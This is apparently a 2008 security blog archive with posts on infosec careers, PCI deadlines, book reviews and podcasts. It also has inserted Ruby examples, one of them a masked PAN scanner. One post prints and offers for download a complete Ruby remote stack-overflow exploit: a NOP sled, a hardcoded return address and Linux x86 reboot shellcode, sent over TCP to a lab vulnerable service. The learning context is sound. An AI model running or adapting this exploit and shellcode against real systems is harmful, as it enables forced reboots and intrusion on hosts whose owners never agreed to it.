February 29th, 2008 Anthony Towry
For me, reading blog comments on popular sites is usually something of an exercise in self-hate. More often than not it's a drive through the unhelpful. I do love it, though, when I come across a gem that's truly informative.
I recently had such an experience reading the comments to a SecurityFocus article on the skills required by most individuals to enter the information security field. This article describes the route I've heard the most about: one that involves experience in admin duties or networking.
Grant Bugher of the Perimeter Grid blog had a post covering another route to the information security field. The route he describes and has personally taken pulls heavily from experience in development and writing secure code. This route is crazy interesting to me and I'm glad to see I'm naturally heading down the road he's talking about.
It's really a great post that gives hope to the coder who wants to break into the field. If you're into development and information security, check it out. That said, the job boards don't lie, and the state of things today does not appear to favor this path.
Posted in Programming, Security, Web development | No Comments »
February 27th, 2008 Anthony Towry
Recently the idea hit me to look into what it would take to locate personal account numbers (PANs) that had been unknowingly filed away by applications or server logs. I quickly found three open source tools to enlist.
Listen to find out which one I liked and which ones are fit for /dev/null. Enjoy the show!
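Since the episode doesn't show what such tools actually look for, here is an added example of the core check (my own illustration, not one of the three tools or code from the original post): scan log lines for runs of 13 to 19 digits, optionally split by spaces or dashes, keep only those that pass the Luhn mod-10 check, and report them masked so the findings file doesn't itself become a new place where full card numbers are stored. The helper names (luhn_valid?, find_pans, scan_log), the candidate regex and the sample log lines are constructed for this illustration; 4111111111111111 is a widely used Luhn-valid test number.

```ruby
#!/usr/bin/env ruby
# Added example: find candidate card numbers (PANs) in log lines.
# A digit run of 13-19 characters, optionally separated by single spaces or
# dashes, is reported only when it also passes the Luhn check, which filters
# out most timestamps, order ids and epoch values.

# Luhn mod-10 check on a string of ASCII digits.
def luhn_valid?(digits)
  sum = 0
  digits.reverse.each_char.with_index do |ch, i|
    d = ch.to_i
    if i.odd?            # every second digit from the right is doubled
      d *= 2
      d -= 9 if d > 9
    end
    sum += d
  end
  (sum % 10).zero?
end

# Candidate pattern (constructed for this example): 13-19 digits with an
# optional single space or dash between digits. The \b anchors stop us from
# matching a window inside a longer numeric run.
PAN_CANDIDATE = /\b(?:\d[ -]?){12,18}\d\b/

# Scan one line; returns an array of [masked_pan, offset] for each hit.
# Masking keeps the first six and last four digits only.
def find_pans(line)
  hits = []
  line.scan(PAN_CANDIDATE) do |raw|
    offset = Regexp.last_match.begin(0)
    digits = raw.delete(' -')
    next unless luhn_valid?(digits)
    masked = digits[0, 6] + '*' * (digits.length - 10) + digits[-4, 4]
    hits << [masked, offset]
  end
  hits
end

# Scan many lines; returns {line_number => hits} for lines with at least one hit.
def scan_log(lines)
  report = {}
  lines.each_with_index do |line, idx|
    found = find_pans(line)
    report[idx + 1] = found unless found.empty?
  end
  report
end

# Constructed sample log: a Luhn-valid test PAN, the same number with dashes,
# a 16-digit value that fails Luhn, and a plain epoch timestamp.
SAMPLE_LOG = [
  '2008-02-27 10:15:01 order=1234 card=4111111111111111 amount=19.99',
  '2008-02-27 10:15:02 retry card=4111-1111-1111-1111',
  '2008-02-27 10:15:03 session=4111111111111112 ok',
  '2008-02-27 10:15:04 epoch=1204107304 nothing to see'
]

if __FILE__ == $0
  scan_log(SAMPLE_LOG).each do |lineno, hits|
    hits.each { |masked, off| puts "line #{lineno} offset #{off}: #{masked}" }
  end
end
```

Run against the sample, lines 1 and 2 are reported and lines 3 and 4 are not. The Luhn check is what makes the difference between a useful finding and a pile of false positives, and the masking is deliberate: a scanner that writes full PANs into its own report has just widened the cardholder data environment.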

Finding PANs With Open Source Tools [24:58m]
Posted in Podcast | No Comments »
February 26th, 2008 Anthony Towry

Insider threat is an area of security with crazy potential to turn things over on an organization in a big way. These attackers are trusted, knowledgeable and quite often fully authorized by the systems in place to perform whatever dirty deed they've got in mind.
Most people would rather not think of their coworkers as potential criminals even when confronted with studies, news stories and statistics that focus the light on just how relevant these threats are. This book should help.
Brian makes use of multiple dynamic case studies and experience that keeps the reader engaged in almost cinematic suspense. He presents information on the type of person behind the attacks and shows off the kind of correlation that an Enterprise Security Management (ESM) system should perform.
I really enjoyed this book; it takes on the hard job of explaining what can be done when you can't prevent, only detect and respond.
Posted in Security | No Comments »
February 26th, 2008 Anthony Towry
Microsoft is releasing documentation to the public regarding quite a few of the protocols that are implemented by their leading products.
This sounds like an excellent time for someone to start working on some fuzzing tools.
Posted in Programming | No Comments »
February 13th, 2008 Anthony Towry
This Friday we are getting back into the trenches at the DC405. We have a talk coming up on remote exploitation of stack-based overflows that will be presented by ri0t.
So, I've been checking out the write-up by Preddy regarding the service. It's a nice walk-through on exploiting an example vulnerable service using both C and Perl. It's informative; I had to adjust my payload size (no biggie) and add a #include <string.h>, but overall it's a solid example without errors.
Exploits written in C are fairly common. Exploits written in Perl aren't rare. Exploits written using Ruby are like unicorns... they probably exist, but you never see one (at least where I'm keeping up with them). At any rate, I decided to look into rewriting the example exploit in Ruby and scratching the surface concerning Ruby sockets. It turns out that this is an extremely simple thing to do.
#!/usr/bin/ruby
# http://www.calculateddecision.com
require 'socket'

port = 7500
victim = ARGV[0]

nop = "\x90"
sled = nop * 240                  # NOP sled placed in front of the shellcode
# This will probably be different for you
eip = "\xa8\xf9\xff\xbf"          # return address that lands inside the sled
# 20 byte reboot shellcode Linux x86 Thanks to izik <izik@tty64.org>
shellcode = "\x6a\x58" +
            "\x58" +
            "\xbb\xad\xde\xe1\xfe" +
            "\xb9\x69\x19\x12\x28" +
            "\xba\x67\x45\x23\x01" +
            "\xcd\x80"
payload = sled + shellcode + eip  # sled, shellcode, then the overwritten return address

if ARGV.length < 1                # Brief usage
  puts "You have to give me a target"
else
  mysocket = TCPSocket.new(victim, port)
  mysocket.send(payload, 0)
  mysocket.close
end
As you can see, the TCPSocket constructor only requires an endpoint and a port. What's nice is that you can actually throw a domain name at it and it will resolve it. I half wondered if the hex bytes would need to be encoded or anything, but this is also handled for us without issue.
Looking at Preddy's Perl example, these two forms don't really differ all that much, and in fact I'm not entirely sure that there isn't a simpler socket constructor available in Perl (if nothing else, on CPAN). Even so, Ruby does IMHO offer a more inviting grammar.
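To see both of those points for yourself, here is an added example (my own illustration, not code from the original post or from Preddy's write-up) that stands up a throwaway listener on the loopback interface, connects to it by hostname through TCPSocket, and checks that a string of raw bytes arrives byte-for-byte unchanged. The helper names (loopback_echo_server, round_trip, bytes_intact?) and the sample byte string are constructed for this illustration.

```ruby
#!/usr/bin/env ruby
# Added example: a loopback round trip showing that TCPSocket accepts a
# hostname (resolution is done for us) and that raw bytes such as "\x90"
# or "\xcd\x80" cross the wire without any encoding step.
require 'socket'

# Start a throwaway TCP listener on the loopback interface. Port 0 lets the
# kernel pick a free port; the server thread reads until the client closes
# and hands back everything it received (as an ASCII-8BIT string).
def loopback_echo_server
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  thread = Thread.new do
    client = server.accept
    data = client.read
    client.close
    server.close
    data
  end
  [port, thread]
end

# Connect by hostname rather than IP to show that TCPSocket resolves it,
# write the bytes exactly as given, and return what the listener received.
def round_trip(bytes, host = 'localhost')
  port, receiver = loopback_echo_server
  sock = TCPSocket.new(host, port)
  sock.write(bytes)
  sock.close
  receiver.value
end

# Byte-level comparison: force both sides to ASCII-8BIT so the check does
# not depend on the encoding the literal picked up from the source file.
def bytes_intact?(sent)
  received = round_trip(sent)
  received.b == sent.b && received.bytesize == sent.bytesize
end

if __FILE__ == $0
  # Constructed sample: filler bytes plus the int 0x80 bytes from the
  # listing above, used here only as awkward, non-text bytes to transport.
  sample = ("\x90".b * 8) + "\xcd\x80".b + "\x00\xff".b
  puts bytes_intact?(sample) ? "bytes arrived unchanged" : "bytes were altered"
end
```

One caveat for anyone on Ruby 1.9 or later: a literal like "\x90" carries the source file's encoding (usually UTF-8) even though it is not valid UTF-8, so concatenating it with a string that came from elsewhere can raise Encoding::CompatibilityError. Calling .b on the literal gives an ASCII-8BIT copy, which sidesteps that and makes byte comparisons unambiguous; the bytes themselves go out on the socket verbatim either way.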
You can download my send_overflow.rb here.
Notes:
xWinGs wrote a local ENV variable example
Posted in Programming, Security | 2 Comments »
February 10th, 2008 Anthony Towry
The PCI Data Security Standard requirement for securing web applications against known attacks becomes effective June 30, 2008; until then the recommendations are only "best practice". That leaves just over four months to address your organization's cardholder environment web application security needs.
Posted in Programming, Security | No Comments »
February 8th, 2008 Anthony Towry

I recently finished flipping through Podcasting Hacks. I say flipping, because I read it in a completely hit-and-run way, digging into the hacks that screamed out.
The book isn't bad, but is definitely geared toward the podcasting newbie. The depth at which format styles and interviewing is covered should be sufficient for any newcomer to produce interesting content.
I would have personally liked to have seen a bit more on some of the technical audio mixing and post production stuff, but who are we kidding? Like my podcast is ever going to be more than a Fisher-Price microphone and a kazoo.
Posted in Books, Podcast | No Comments »
February 6th, 2008 Anthony Towry
In this episode of The Decision, I cover some of the issues that people run into as they start experimenting and exploring stack-based buffer overflows on Linux. Stack smashing is an interesting and rewarding exercise for security enthusiasts. It perfectly illustrates the idea of what can go wrong when trusting user input.
Hopefully, with a handful of tips on the "gotchas", we can make it a bit less frustrating at the start.

Issues With Stack Smashing [36:03m]
Posted in Podcast | No Comments »